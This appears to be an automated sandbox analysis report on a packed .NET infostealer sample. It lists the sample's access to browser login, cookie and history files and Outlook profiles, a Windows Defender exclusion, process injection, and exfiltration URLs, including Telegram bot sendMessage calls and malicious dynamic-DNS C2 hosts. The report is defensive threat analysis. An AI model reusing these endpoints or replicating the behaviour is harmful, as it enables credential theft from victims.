                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe"Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 00000005.00000002.3850855870.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.3508828.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.36a0ea0.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.36a0ea0.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.3508828.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.3849096449.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1381482230.0000000003479000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe PID: 7412, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe PID: 7600, type: MEMORYSTR
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.3508828.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.36a0ea0.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.36a0ea0.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.3508828.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.3849096449.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1381482230.0000000003479000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe PID: 7412, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe PID: 7600, type: MEMORYSTR
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.3508828.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.36a0ea0.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.36a0ea0.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.3508828.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.3849096449.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1381482230.0000000003479000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe PID: 7412, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe PID: 7600, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 00000005.00000002.3850855870.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.3508828.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.36a0ea0.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.36a0ea0.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.3508828.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.3849096449.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1381482230.0000000003479000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe PID: 7412, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe PID: 7600, type: MEMORYSTR
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.3508828.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.36a0ea0.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.36a0ea0.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.3508828.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.3849096449.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1381482230.0000000003479000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe PID: 7412, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe PID: 7600, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                Native API
                1
                DLL Side-Loading
                1
                DLL Side-Loading
                11
                Disable or Modify Tools
                1
                OS Credential Dumping
                1
                File and Directory Discovery
                Remote Services11
                Archive Collected Data
                1
                Web Service
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts111
                Process Injection
                1
                Deobfuscate/Decode Files or Information
                1
                Input Capture
                13
                System Information Discovery
                Remote Desktop Protocol1
                Data from Local System
                3
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)3
                Obfuscated Files or Information
                Security Account Manager1
                Security Software Discovery
                SMB/Windows Admin Shares1
                Screen Capture
                11
                Encrypted Channel
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                Software Packing
                NTDS1
                Process Discovery
                Distributed Component Object Model1
                Email Collection
                3
                Non-Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Timestomp
                LSA Secrets31
                Virtualization/Sandbox Evasion
                SSH1
                Input Capture
                14
                Application Layer Protocol
                Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading
                Cached Domain Credentials1
                Application Window Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                Masquerading
                DCSync1
                System Network Configuration Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job31
                Virtualization/Sandbox Evasion
                Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt111
                Process Injection
                /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1518592 Sample: SecuriteInfo.com.Trojan.Pac... Startdate: 25/09/2024 Architecture: WINDOWS Score: 100 24 reallyfreegeoip.org 2->24 26 api.telegram.org 2->26 28 3 other IPs or domains 2->28 36 Found malware configuration 2->36 38 Malicious sample detected (through community Yara rule) 2->38 40 Antivirus detection for URL or domain 2->40 46 13 other signatures 2->46 8 SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe 4 2->8         started        signatures3 42 Tries to detect the country of the analysis system (by using the IP) 24->42 44 Uses the Telegram API (likely for C&C communication) 26->44 process4 file5 22 SecuriteInfo.com.T....4038.12608.exe.log, ASCII 8->22 dropped 48 Adds a directory exclusion to Windows Defender 8->48 50 Injects a PE file into a foreign processes 8->50 12 SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe 15 2 8->12         started        16 powershell.exe 23 8->16         started        signatures6 process7 dnsIp8 30 api.telegram.org 149.154.167.220, 443, 49723 TELEGRAMRU United Kingdom 12->30 32 reallyfreegeoip.org 188.114.97.3, 443, 49705, 49706 CLOUDFLARENETUS European Union 12->32 34 checkip.dyndns.com 193.122.6.168, 49703, 49708, 49711 ORACLE-BMC-31898US United States 12->34 52 Tries to steal Mail credentials (via file / registry access) 12->52 54 Tries to harvest and steal browser information (history, passwords, etc) 12->54 56 Loading BitLocker PowerShell Module 16->56 18 WmiPrvSE.exe 16->18         started        20 conhost.exe 16->20         started        signatures9 process10

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe63%ReversingLabsByteCode-MSIL.Infostealer.LokiBot
                SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
                https://duckduckgo.com/ac/?q=0%URL Reputationsafe
                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
                http://checkip.dyndns.org0%URL Reputationsafe
                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                https://www.ecosia.org/newtab/0%URL Reputationsafe
                http://varders.kozow.com:80810%URL Reputationsafe
                http://aborters.duckdns.org:8081100%URL Reputationmalware
                https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                http://checkip.dyndns.org/0%URL Reputationsafe
                http://anotherarmy.dns.army:8081100%URL Reputationmalware
                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                http://checkip.dyndns.org/q0%URL Reputationsafe
                https://reallyfreegeoip.org0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded0%URL Reputationsafe
                https://reallyfreegeoip.org/xml/0%URL Reputationsafe
                https://www.office.com/0%Avira URL Cloudsafe
                https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
                https://api.telegram.org/bot0%Avira URL Cloudsafe
                https://api.telegram.org0%Avira URL Cloudsafe
                https://api.telegram.org/bot/sendMessage?chat_id=&text=0%Avira URL Cloudsafe
                https://www.office.com/lB0%Avira URL Cloudsafe
                https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:675052%0D%0ADate%20and%20Time:%2026/09/2024%20/%2003:19:28%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20675052%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D0%Avira URL Cloudsafe
                https://chrome.google.com/webstore?hl=en0%Avira URL Cloudsafe
                https://reallyfreegeoip.org/xml/8.46.123.330%Avira URL Cloudsafe
                https://reallyfreegeoip.org/xml/8.46.123.33$0%Avira URL Cloudsafe
                https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:675052%0D%0ADate%20a0%Avira URL Cloudsafe
                https://chrome.google.com/webstore?hl=enlB0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                reallyfreegeoip.org
                188.114.97.3
                truetrue
                  unknown
                  api.telegram.org
                  149.154.167.220
                  truetrue
                    unknown
                    checkip.dyndns.com
                    193.122.6.168
                    truefalse
                      unknown
                      checkip.dyndns.org
                      unknown
                      unknowntrue
                        unknown
                        time.windows.com
                        unknown
                        unknowntrue
                          unknown
                          NameMaliciousAntivirus DetectionReputation
                          https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:675052%0D%0ADate%20and%20Time:%2026/09/2024%20/%2003:19:28%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20675052%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://reallyfreegeoip.org/xml/8.46.123.33false
                          • Avira URL Cloud: safe
                          unknown
                          http://checkip.dyndns.org/false
                          • URL Reputation: safe
                          unknown
                          NameSourceMaliciousAntivirus DetectionReputation
                          https://www.office.com/SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3850855870.00000000033BA000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://duckduckgo.com/chrome_newtabSecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.0000000004211000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.0000000004503000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://duckduckgo.com/ac/?q=SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.0000000004211000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.0000000004503000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://api.telegram.orgSecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3850855870.00000000032D8000.00000004.00000800.00020000.00000000.sdmpfalse
